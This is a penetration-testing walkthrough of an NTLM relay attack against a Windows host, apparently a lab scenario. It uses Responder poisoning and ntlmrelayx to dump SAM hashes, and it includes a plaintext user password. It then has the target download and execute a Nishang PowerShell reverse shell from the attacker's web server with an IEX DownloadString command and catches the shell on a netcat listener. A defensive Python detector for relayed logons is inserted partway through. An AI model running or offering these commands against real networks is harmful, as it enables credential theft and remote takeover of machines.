NTLM Relay

Imagine we have a user who is Administrator on another computer. We could use that privilege to extract the SAM hashes, or even execute remote commands.

For example:

Sara Ardila is now Administrator on Carlos Villamizar's computer (PC-CARLOS).

crackmapexec smb 10.10.10.0/24 -u 'sara.ardila' -p 'Sar@91082'

Extract SAM hashes

We need to create a file of targets, targets.txt (in this case containing PC-CARLOS):

Then update the Responder configuration, turning its SMB and HTTP servers off so that those connections reach ntlmrelayx instead:

Responder is available from https://github.com/lgandx/Responder

sudo python3 Responder/Responder.py -I eth0

Now, execute ntlmrelayx:

python3 ntlmrelayx.py -tf targets.txt -smb2support

So, knowing that Sara is Administrator on Carlos's computer, we need to wait for a connection from Sara to a service or task. With the poisoning on the network, that connection is tricked into ending at our Responder; ntlmrelayx.py then relays Sara's authentication to PC-CARLOS and uses her privileges there.

In Responder:

And ntlmrelayx:

And we are dumping the SAM hashes; with these we can do Pass-The-Hash.
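As an added example from the defender's side (not part of the original walkthrough), a small Python check over constructed Security event 4624 records that flags the trace a relay like this one leaves on PC-CARLOS: an NTLM network logon whose WorkstationName (Sara's machine, carried inside the NTLM message) does not match the source IpAddress (the relay host, 172.16.200.7 as used later on this page). The host-to-IP inventory, the host name PC-SARA and every address other than 172.16.200.7 are assumptions.

```python
import json

# Constructed sample of Windows Security event 4624 records as PC-CARLOS
# might ship them to a SIEM (one JSON object per line). 172.16.200.7 is
# the relay host from the walkthrough; the other addresses and the
# host name PC-SARA are assumptions for this example.
SAMPLE_EVENTS = """
{"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM", "TargetUserName": "sara.ardila", "WorkstationName": "PC-SARA", "IpAddress": "172.16.200.20"}
{"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM", "TargetUserName": "sara.ardila", "WorkstationName": "PC-SARA", "IpAddress": "172.16.200.7"}
{"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "Kerberos", "TargetUserName": "sara.ardila", "WorkstationName": "PC-SARA", "IpAddress": "172.16.200.20"}
{"EventID": 4624, "LogonType": 2, "AuthenticationPackageName": "NTLM", "TargetUserName": "carlos.villamizar", "WorkstationName": "PC-CARLOS", "IpAddress": "127.0.0.1"}
"""

# Assumed asset inventory: the addresses each workstation is expected to
# connect from (DHCP leases or DNS records in a real environment).
HOST_IPS = {
    "PC-SARA": {"172.16.200.20"},
    "PC-CARLOS": {"172.16.200.30", "127.0.0.1"},
}

def parse_events(text):
    """Parse one JSON event per line, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]

def is_relay_candidate(event, host_ips):
    """True for an NTLM network logon whose claimed workstation name does
    not match the address the connection came from. A relayed logon keeps
    the victim's workstation name inside the NTLM AUTHENTICATE message,
    but the TCP connection to the target originates at the relaying host."""
    if event.get("EventID") != 4624 or event.get("LogonType") != 3:
        return False
    if event.get("AuthenticationPackageName") != "NTLM":
        return False
    workstation = event.get("WorkstationName", "").upper()
    source_ip = event.get("IpAddress", "")
    if workstation not in host_ips:
        return True  # unknown name: inventory gap or spoofed, review it
    return source_ip not in host_ips[workstation]

def find_relay_candidates(text, host_ips=HOST_IPS):
    """Return the events in text that look like relayed NTLM logons."""
    return [e for e in parse_events(text) if is_relay_candidate(e, host_ips)]

if __name__ == "__main__":
    for hit in find_relay_candidates(SAMPLE_EVENTS):
        print("possible NTLM relay: user=%s claimed=%s from=%s" % (
            hit["TargetUserName"], hit["WorkstationName"], hit["IpAddress"]))
```

Requiring SMB signing on PC-CARLOS would stop the relay itself; this check is for spotting attempts against hosts where signing is not yet enforced.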

Execute remote commands

Nishang is available from https://github.com/samratashok/nishang

cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 .
mv Invoke-PowerShellTcp.ps1 ipst.ps1

Take line 20:

19 │ .EXAMPLE
20 │ PS > Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444

Copy that line to the bottom of the file (without the "PS >" prompt) and change the values to our own IP address and port:

Now, serve that file and start a listener on port 4460 to receive the PowerShell reverse shell:

➧ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
➧ nc -lvp 4460
listening on [any] 4460 ...

Now, execute ntlmrelayx:

python3 ntlmrelayx.py -tf targets.txt -smb2support -c "powershell IEX(New-Object Net.WebClient).downloadString('http://172.16.200.7:8000/ipst.ps1')"

With this, the target fetches the file from our server and imports its content; since the last line is uncommented, it is executed right after the import.

Now, start our Responder (remember: with SMB and HTTP off):

sudo python3 Responder/Responder.py -I eth0

Wait for the connection from Sara to an invalid or down service/task/folder:

In our listener:

We are inside PC-CARLOS, exploiting Sara's privilege on PC-CARLOS :O
